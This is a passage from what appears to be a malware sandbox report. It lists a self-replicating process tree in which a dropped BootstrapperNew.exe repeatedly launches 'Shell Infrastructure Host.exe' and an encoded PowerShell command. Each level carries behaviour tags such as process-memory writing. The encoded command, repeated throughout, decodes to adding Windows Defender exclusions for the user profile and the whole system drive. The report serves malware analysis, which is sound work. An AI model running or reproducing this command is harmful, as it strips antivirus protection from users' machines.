        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3316
      - C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1560
      - C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        6⤵
        Checks computer location settings
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2868
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4540
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2024
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        7⤵
        Checks computer location settings
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4860
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        8⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2692
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2980
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        8⤵
        Checks computer location settings
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4588
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        9⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4660
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1844
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        9⤵
        Checks computer location settings
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:2076
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        10⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:820
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        11⤵
        
        PID:2868
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        10⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3060
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        10⤵
        Checks computer location settings
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:4704
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        11⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1036
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        11⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4944
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        11⤵
        Checks computer location settings
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:4848
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        12⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1076
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        12⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4752
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        12⤵
        Checks computer location settings
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:3652
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        13⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4948
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        13⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1452
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        13⤵
        Checks computer location settings
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:4580
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        14⤵
        System Location Discovery: System Language Discovery
        
        PID:4940
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        14⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1488
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        14⤵
        Checks computer location settings
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:4668
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        15⤵
        
        PID:4628
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        15⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2372
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        15⤵
        
        PID:3740
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        16⤵
        
        PID:4596
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        16⤵
        
        PID:2168
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        16⤵
        
        PID:3004
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        17⤵
        
        PID:5248
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        17⤵
        
        PID:5284
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        17⤵
        
        PID:5308
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        18⤵
        
        PID:5576
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        18⤵
        
        PID:5604
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        18⤵
        
        PID:5700
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        19⤵
        
        PID:5888
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        19⤵
        
        PID:5952
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        19⤵
        
        PID:5960
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        20⤵
        
        PID:2380
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        20⤵
        
        PID:2372
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        20⤵
        
        PID:4500
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        21⤵
        
        PID:5228
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        21⤵
        
        PID:1944
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        21⤵
        
        PID:5652
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        22⤵
        
        PID:6084
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        22⤵
        
        PID:6092
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        22⤵
        
        PID:5840
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        23⤵
        
        PID:6024
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        23⤵
        
        PID:5364
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        23⤵
        
        PID:1452
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        24⤵
        
        PID:4640
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        24⤵
        
        PID:1444
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        24⤵
        
        PID:5632
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        25⤵
        
        PID:6124
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        25⤵
        
        PID:5124
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        25⤵
        
        PID:6164
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        26⤵
        
        PID:6468
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        26⤵
        
        PID:6500
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        26⤵
        
        PID:6548
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        27⤵
        
        PID:6796
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        27⤵
        
        PID:6804
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        27⤵
        
        PID:6812
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        28⤵
        
        PID:6984
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        28⤵
        
        PID:6992
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        28⤵
        
        PID:7036
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        29⤵
        
        PID:6204
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        29⤵
        
        PID:5428
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        29⤵
        
        PID:1936
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        30⤵
        
        PID:5124
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        30⤵
        
        PID:6404
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        30⤵
        
        PID:6524
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        31⤵
        
        PID:6696
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        31⤵
        
        PID:6676
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        31⤵
        
        PID:7072
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
